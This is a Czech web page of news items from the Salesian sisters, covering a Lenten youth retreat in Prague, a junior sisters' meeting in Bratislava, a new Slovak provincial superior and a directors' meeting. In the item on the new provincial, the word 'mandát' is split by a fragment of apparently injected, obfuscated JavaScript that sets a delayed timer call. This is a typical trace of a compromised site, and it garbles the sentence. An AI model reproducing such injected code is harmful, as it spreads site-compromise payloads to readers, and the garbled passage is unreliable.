Duchovní obnova pro mladé

Duchovní obnova pro mladé

První postní víkend se přes dvacet mladých lidí zúčastnilo postní duchovní obnovy v Praze –Karlíně, kterou pořádaly sestry salesiánky a kázal Petr Vaculík, provinciál SDB. Páteční podvečer byl věnován modlitbě křížové cesty s vyráběním křížů. Celá obnova se konala v tichu a rozjímání nad Božím slovem. To uvedlo mladé do tajemství smlouvy Boha s jeho lidem, která začíná od stvoření světa a prochází celým Starým Zákonem až k vrcholu Ježíšovy smlouvy s člověkem, která vrcholí ve velikonočních událostech.

 

Nechyběl čas pro osobní i společnou modlitbu, svátost smíření i rozhovory se sestrami. Nedělní dopoledne bylo věnováno smyslu a podstatě postní doby, která je završena obnovou našeho křtu.

Podívejte se na další fotografie.

 

Setkání juniorek na Slovensku

Setkání juniorek na Slovensku

Setkání juniorek se konaly o víkendu 9.-11.2.2018, tentokrát hned za hranicemi ČR, v Bratislavě, aby to měly „západočešky“ i „východňárky“ skoro na půli cesty. Ze Slovenské provincie se účastnilo všech 14 sester juniorek (sester s časnými sliby) a z Českolitevské Inspektorie pouze jedna, neboť druhá to jistila z postele. Téma poslušnost přednášela sr. Monika Skalová, budoucí provinciálka slovenských salesiánek. Česká sestra Míša Pitterová přednášela kanonické aspekty slibů. Setkání se účastnila i Českolitevská Inspektorka sr. Jana Svobodová a dokonce nás na chvíli navštívila se svou magistrou i naše novicka Verča Beránková. Kromě hutných a poučných přednášek bylo na programu sdílení, modlitby, mše svatá, různé společné chvíle zábavy. Kdo chtěl, stihl i film Wonder a také jsme na dálku sledovaly ZOH. Setkání se neslo v duchu velké radosti ze setkání a často i nočního bdění (většinou ne na modlitbách J). Děkujeme slovenským sestrám za vstřícnost pořádat některá setkání společně s námi a těšíme na další.
Podívejte se na pár fotek ze setkání.

Jana Marková

Nová provinciálka na Slovensku

Nová provinciálka na Slovensku

Sestry salesiánky na Slovensku mají novou provinciální představenou, je jí sestra Monika Skálová. Sestra Monika převezme službu od 5. srpna 2018. Současná provinciální představená sr. Jana Kurkiová tímto končí svůj 6-letý mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andát.

více informací najdete na webu slovenských sester saleziánek.

Setkání ředitelek a ekonomek komunit

Setkání ředitelek a ekonomek komunit

O prvním únorovém víkendu proběhlo setkání ředitelek komunit a ekonomek, které začalo poprvé v historii půldenním společným setkáním a diskuzí nad důležitými tématy života inspektorie a komunit.
Poté ředitelky komunit odjely na Lipiny, kde pokračovaly své setkání rozvahou nad personální situací komunit. Provinciál SDB Petr Vaculík, který se části setkání také zúčastnil, přinesl podněty k zamýšlení se nad salesiánskou modlitbou.

Všechny své plány, starosti i radosti mohly vkládat do slavení mše svaté a společné modlitby.
Ekonomky komunit pokračovaly svým setkání v Praze Kobylisích dialogem nad praktickými tématy ze života komunit a zakončily jej krás

ným výletem do okolí Prahy.

Podívejte se na fotky.